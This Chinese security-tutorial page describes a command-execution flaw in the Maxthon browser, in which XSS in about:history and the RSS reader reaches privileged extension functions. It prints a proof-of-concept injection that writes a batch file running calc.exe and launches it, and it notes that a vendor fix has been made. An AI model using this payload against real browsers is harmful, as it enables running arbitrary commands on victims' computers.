手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >傲游浏览器命令执行漏洞介绍以及修复方案
傲游浏览器命令执行漏洞介绍以及修复方案
摘要:这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,1.about:history中存在...

傲游浏览器命令执行漏洞介绍以及修复方案1

傲游浏览器命令执行漏洞介绍以及修复方案2

傲游浏览器命令执行漏洞介绍以及修复方案3

傲游浏览器命令执行漏洞介绍以及修复方案4

这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,

1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。

2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:Documents and SettingsAdministratorLocal SettingsTemp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。

3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞

4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。

构造类似链接

/1.html#"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:WINDOWSsystem32")'/>

在遨游中访问,

然后打开about:history,就可以看到效果了

那个pdf给的例子是构造了1.html的内容为

a=window.location.href='about:history';

修复方案:

ms遨游已经修复了直接打开about:history这个洞

【傲游浏览器命令执行漏洞介绍以及修复方案】相关文章:

SwiftView ActiveX控件和浏览器插件含栈溢出漏洞

豆包网的搜索型盲注漏洞与分析及修复方案(图)

解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

Symark PowerBroker 客户端多个本地命令溢出漏洞

Alt-N MDaemon IMAP 服务器FETCH 命令栈溢出漏洞

小心字符集导致浏览器软件跨站脚本攻击

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

OmniPCX Enterprise存在远程命令注入漏洞

discuz!7.1、7.2 远程代码执行漏洞exp

Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法

精品推荐
分类导航